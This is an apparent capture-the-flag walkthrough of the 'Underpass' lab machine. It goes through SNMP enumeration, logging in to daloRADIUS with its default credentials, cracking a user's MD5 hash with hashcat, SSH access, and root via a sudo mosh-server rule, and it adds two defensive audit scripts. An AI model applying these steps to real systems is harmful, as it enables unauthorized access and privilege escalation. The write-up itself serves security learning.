UNDERPASS



USER Flag

Enumeration

  • We get started with the typical steps; if you do not know these steps we recommend you RTFM and learn systems, programming and networking.
  • In our port scan we find some juicy sh1t with the UDP scan; considering this is an easy box we can assume an easy path.
pacman -S net-snmp
  • Let's run snmpwalk
snmpwalk -c public -v2c underpass.htb
SNMPv2-MIB::sysDescr.0 = STRING: Linux underpass 5.15.0-126-generic #136-Ubuntu SMP Wed Nov 6 10:38:22 UTC 2024 x86_64
SNMPv2-MIB::sysObjectID.0 = OID: NET-SNMP-MIB::netSnmpAgentOIDs.10
DISMAN-EVENT-MIB::sysUpTimeInstance = Timeticks: (256568) 0:42:45.68
SNMPv2-MIB::sysContact.0 = STRING: steve@underpass.htb
SNMPv2-MIB::sysName.0 = STRING: UnDerPass.htb is the only daloradius server in the basin!
SNMPv2-MIB::sysLocation.0 = STRING: Nevada, U.S.A. but not Vegas
SNMPv2-MIB::sysServices.0 = INTEGER: 72
SNMPv2-MIB::sysORLastChange.0 = Timeticks: (0) 0:00:00.00
SNMPv2-MIB::sysORID.1 = OID: SNMP-FRAMEWORK-MIB::snmpFrameworkMIBCompliance
SNMPv2-MIB::sysORID.2 = OID: SNMP-MPD-MIB::snmpMPDCompliance
SNMPv2-MIB::sysORID.3 = OID: SNMP-USER-BASED-SM-MIB::usmMIBCompliance
SNMPv2-MIB::sysORID.4 = OID: SNMPv2-MIB::snmpMIB
SNMPv2-MIB::sysORID.5 = OID: SNMP-VIEW-BASED-ACM-MIB::vacmBasicGroup
SNMPv2-MIB::sysORID.6 = OID: TCP-MIB::tcpMIB
SNMPv2-MIB::sysORID.7 = OID: UDP-MIB::udpMIB
SNMPv2-MIB::sysORID.8 = OID: IP-MIB::ip
SNMPv2-MIB::sysORID.9 = OID: SNMP-NOTIFICATION-MIB::snmpNotifyFullCompliance
SNMPv2-MIB::sysORID.10 = OID: NOTIFICATION-LOG-MIB::notificationLogMIB
SNMPv2-MIB::sysORDescr.1 = STRING: The SNMP Management Architecture MIB.
SNMPv2-MIB::sysORDescr.2 = STRING: The MIB for Message Processing and Dispatching.
SNMPv2-MIB::sysORDescr.3 = STRING: The management information definitions for the SNMP User-based Security Model.
SNMPv2-MIB::sysORDescr.4 = STRING: The MIB module for SNMPv2 entities
SNMPv2-MIB::sysORDescr.5 = STRING: View-based Access Control Model for SNMP.
SNMPv2-MIB::sysORDescr.6 = STRING: The MIB module for managing TCP implementations
SNMPv2-MIB::sysORDescr.7 = STRING: The MIB module for managing UDP implementations
SNMPv2-MIB::sysORDescr.8 = STRING: The MIB module for managing IP and ICMP implementations
SNMPv2-MIB::sysORDescr.9 = STRING: The MIB modules for managing SNMP Notification, plus filtering.
SNMPv2-MIB::sysORDescr.10 = STRING: The MIB module for logging SNMP Notifications.
SNMPv2-MIB::sysORUpTime.1 = Timeticks: (0) 0:00:00.00
SNMPv2-MIB::sysORUpTime.2 = Timeticks: (0) 0:00:00.00
SNMPv2-MIB::sysORUpTime.3 = Timeticks: (0) 0:00:00.00
SNMPv2-MIB::sysORUpTime.4 = Timeticks: (0) 0:00:00.00
SNMPv2-MIB::sysORUpTime.5 = Timeticks: (0) 0:00:00.00
SNMPv2-MIB::sysORUpTime.6 = Timeticks: (0) 0:00:00.00
SNMPv2-MIB::sysORUpTime.7 = Timeticks: (0) 0:00:00.00
SNMPv2-MIB::sysORUpTime.8 = Timeticks: (0) 0:00:00.00
SNMPv2-MIB::sysORUpTime.9 = Timeticks: (0) 0:00:00.00
SNMPv2-MIB::sysORUpTime.10 = Timeticks: (0) 0:00:00.00
HOST-RESOURCES-MIB::hrSystemUptime.0 = Timeticks: (257805) 0:42:58.05
HOST-RESOURCES-MIB::hrSystemDate.0 = STRING: 2024-12-30,18:53:27.0,+0:0
HOST-RESOURCES-MIB::hrSystemInitialLoadDevice.0 = INTEGER: 393216
HOST-RESOURCES-MIB::hrSystemInitialLoadParameters.0 = STRING: "BOOT_IMAGE=/vmlinuz-5.15.0-126-generic root=/dev/mapper/ubuntu--vg-ubuntu--lv ro net.ifnames=0 biosdevname=0
"
HOST-RESOURCES-MIB::hrSystemNumUsers.0 = Gauge32: 0
HOST-RESOURCES-MIB::hrSystemProcesses.0 = Gauge32: 217
HOST-RESOURCES-MIB::hrSystemMaxProcesses.0 = INTEGER: 0
HOST-RESOURCES-MIB::hrSystemMaxProcesses.0 = No more variables left in this MIB View (It is past the end of the MIB tree)
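The walk above is what a read-only `public` community hands anyone who asks. The following is an added example (not part of the writeup) that triages a saved `snmpwalk` dump from the defender's side: it parses the `MIB::object.index = TYPE: value` lines and reports which fields give away a kernel version, a contact identity, or free-text hints an admin typed into sysName/sysLocation. The sample dump is constructed from the lines shown above; the product watchlist is an assumption.

```python
"""Triage a saved snmpwalk dump for information leaked through a read-only
community string. Added example; the sample lines are copied from the walk
in the writeup and trimmed, nothing is fetched live."""
import re

# Constructed sample (values from the walk above, trimmed to the interesting rows).
SAMPLE_WALK = """\
SNMPv2-MIB::sysDescr.0 = STRING: Linux underpass 5.15.0-126-generic #136-Ubuntu SMP Wed Nov 6 10:38:22 UTC 2024 x86_64
SNMPv2-MIB::sysContact.0 = STRING: steve@underpass.htb
SNMPv2-MIB::sysName.0 = STRING: UnDerPass.htb is the only daloradius server in the basin!
SNMPv2-MIB::sysLocation.0 = STRING: Nevada, U.S.A. but not Vegas
SNMPv2-MIB::sysServices.0 = INTEGER: 72
HOST-RESOURCES-MIB::hrSystemProcesses.0 = Gauge32: 217
HOST-RESOURCES-MIB::hrSystemMaxProcesses.0 = No more variables left in this MIB View (It is past the end of the MIB tree)
"""

# One snmpwalk row: MIB::object.index = TYPE: value
LINE_RE = re.compile(
    r"^(?P<mib>[\w-]+)::(?P<obj>\w+)\.(?P<idx>\d+) = (?P<type>[\w ]+?): ?(?P<val>.*)$")
EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+\.[\w.-]+")
KERNEL_RE = re.compile(r"Linux \S+ (\S+)")       # "Linux <host> <kernel> ..."
# Assumed watchlist: product names an admin might leave in sysName/sysLocation.
PRODUCT_HINTS = ("daloradius", "radius")


def parse_walk(text):
    """Return {object_name: value}. Continuation lines and the trailing
    'No more variables' marker do not match the row pattern and are skipped."""
    values = {}
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            values[m["obj"]] = m["val"]
    return values


def triage(values):
    """Map each leaked item to a finding keyed by what it gives away."""
    findings = {}
    if "sysDescr" in values:
        m = KERNEL_RE.search(values["sysDescr"])
        if m:
            findings["kernel_version"] = m.group(1)     # patch-level fingerprint
    if "sysContact" in values:
        for email in EMAIL_RE.findall(values["sysContact"]):
            findings["contact_identity"] = email        # a username and a domain
    for key in ("sysName", "sysLocation"):
        # A hostname has no spaces; a sentence here is an admin note, not a name.
        if key in values and " " in values[key]:
            findings[key + "_freetext"] = values[key]
    name = values.get("sysName", "").lower()
    for product in PRODUCT_HINTS:
        if product in name:
            findings["product_hint"] = product
            break
    return findings


if __name__ == "__main__":
    for k, v in triage(parse_walk(SAMPLE_WALK)).items():
        print(f"{k:22} {v}")
```

Note that the walk stops right after the hrSystem rows, which is what net-snmp's default `systemonly` view exposes; the real leak is the free text the admin filled in. On the defending side, keep sysContact/sysName/sysLocation bland, bind the agent to a management address with `agentAddress` in `snmpd.conf`, and prefer SNMPv3 over a shared community string.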
  • OK, we find more interesting things; we DuckDuckGo search for daloradius.
  • We find it is a software application: https://www.daloradius.com/
  • Let's read the docs for the software: the default install is in the folder daloradius. Since there is no subdomain we try http://underpass.htb/daloradius
  • Yes, this works... great! Let's find more info.
  • We get the software version on the login page: daloRADIUS 2.2 beta. I assume you will do your own enumeration here as well: http://underpass.htb/daloradius/app/operators/login.php
  • RTFM https://github.com/lirantal/daloradius
  • In the docs folder and the wiki we find the default credentials: https://github.com/lirantal/daloradius/wiki/Installing-daloRADIUS
To log in to the RADIUS Management application, use the following default credentials:

Username: administrator
Password: radius
  • It is an easy box, so yes, they do work. Doh! ;)
  • Poking around we find some juice; the one that turns out to be good for us is in the user management part: http://underpass.htb/daloradius/app/operators/mng-list-all.php
  • We run the Kraken, hashcat, without the -m option so it auto-detects the hash type, even though we know it is a PHP app.
hashcat svcMosh-hash  -m 0 /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt -d 2
  • We got it!
412dd4759978acfcc81deab01b382403:underwaterfriends
  • It is an easy box; let's try SSH, why not.
ssh svcMosh@underpass.htb
svcMosh@underpass.htb's password: 
Welcome to Ubuntu 22.04.5 LTS (GNU/Linux 5.15.0-126-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

 System information as of Mon Dec 30 07:14:31 PM UTC 2024

  System load:  0.0               Processes:             227
  Usage of /:   92.2% of 3.75GB   Users logged in:       0
  Memory usage: 20%               IPv4 address for eth0: 10.129.100.118
  Swap usage:   0%

  => / is using 92.2% of 3.75GB


Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Thu Dec 12 15:45:42 2024 from 10.10.xx.xx
svcMosh@underpass:~$ whoami
svcMosh
svcMosh@underpass:~$ hostname
underpass
  • YAY! Get user.txt.

ROOT

OK, like usual, upload your local enumeration tools...

  • Hold on, this is an easy box, so first the standard steps, like checking for sudo privileges:
sudo -l
Matching Defaults entries for svcMosh on localhost:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User svcMosh may run the following commands on localhost:
    (ALL) NOPASSWD: /usr/bin/mosh-server
  • OK, piece of cake! Let's review that program or script.
sudo /usr/bin/mosh-server --help
Usage: /usr/bin/mosh-server new [-s] [-v] [-i LOCALADDR] [-p PORT[:PORT2]] [-c COLORS] [-l NAME=VALUE] [-- COMMAND...]
  • Let's run strings and some binary tools.
  • After the binary review we look for the mosh client.
svcMosh@underpass:~$ which mosh
/usr/bin/mosh
  • OK, steps: there are many ways to do this, but I think the easiest and simplest is:
export TERM=xterm
mosh --server="sudo /usr/bin/mosh-server" localhost # Accept when prompted "Yes"
  • And we get root!
root@underpass:~# whoami
root
root@underpass:~# hostname
underpass
root@underpass:~# ls /root/
root.txt
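What made the root step a one-liner is visible in the `--help` banner: `mosh-server` takes `-- COMMAND...`, so a `(ALL) NOPASSWD:` rule on it is a root shell with extra steps. The following is an added example (not the writeup's own code) of a sudoers audit a defender can run over `sudo -l` output: it parses the rule lines, looks at each binary's usage banner for a command pass-through, and grades the rule. The sample `sudo -l` text is constructed from the box's rule plus invented ones for contrast; the usage banners other than mosh-server's are assumed.

```python
"""Grade 'sudo -l' rules that amount to an unrestricted root shell.
Added example, not part of the writeup. The sample output and the usage
banners other than mosh-server's are constructed for illustration."""
import re

# Constructed sample: the svcMosh rule from the box plus three made-up rules.
SAMPLE_SUDO_L = """\
User svcMosh may run the following commands on localhost:
    (ALL) NOPASSWD: /usr/bin/mosh-server
    (ALL) /usr/bin/systemctl restart freeradius
    (root) NOPASSWD: /usr/bin/apt update
    (ALL) NOPASSWD: /usr/local/bin/backup.sh
"""

# Usage banners as printed by '<binary> --help'. The mosh-server line is the
# one shown in the writeup; the other two are assumed for the example.
USAGE = {
    "/usr/bin/mosh-server": "Usage: /usr/bin/mosh-server new [-s] [-v] [-i LOCALADDR] "
                            "[-p PORT[:PORT2]] [-c COLORS] [-l NAME=VALUE] [-- COMMAND...]",
    "/usr/bin/systemctl": "systemctl [OPTIONS...] COMMAND ...",
    "/usr/bin/apt": "Usage: apt [options] command",
}

# "(runas) TAG: TAG: /path/to/binary optional args"
RULE_RE = re.compile(
    r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>/\S+)(?P<args>.*)$")
# A banner that advertises running a caller-supplied command after '--' or '-c'.
PASSTHRU_RE = re.compile(r"(?:--|-c)\s+COMMAND")


def parse_rules(text):
    """Turn the command lines of 'sudo -l' output into rule dicts."""
    rules = []
    for line in text.splitlines():
        m = RULE_RE.match(line)
        if m:
            rules.append({
                "runas": m["runas"],
                "nopasswd": "NOPASSWD" in m["tags"],
                "cmd": m["cmd"],
                "args": m["args"].strip(),   # empty means any arguments allowed
            })
    return rules


def audit(rules, usage):
    """Return {binary: verdict} for rules worth attention.
    critical: runs as root and the binary runs an arbitrary command for the caller.
    review:   runs as root, no password, and no argument restriction."""
    verdicts = {}
    for r in rules:
        runs_as_root = r["runas"] in ("ALL", "root")
        passthru = bool(PASSTHRU_RE.search(usage.get(r["cmd"], "")))
        if runs_as_root and passthru:
            verdicts[r["cmd"]] = "critical"
        elif runs_as_root and r["nopasswd"] and not r["args"]:
            verdicts[r["cmd"]] = "review"
    return verdicts


if __name__ == "__main__":
    for cmd, verdict in audit(parse_rules(SAMPLE_SUDO_L), USAGE).items():
        print(f"{verdict:9} {cmd}")
```

The remediation on a box like this is simply to delete the rule: mosh does not need root, because the normal flow starts `mosh-server` over SSH as the logging-in user, and restricting sudo arguments would not help since the server spawns the user's shell even without `-- COMMAND`.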

Thanks for reading. Remember: LEARN, do not just copy! If something is new for you, RTFM/research and learn it.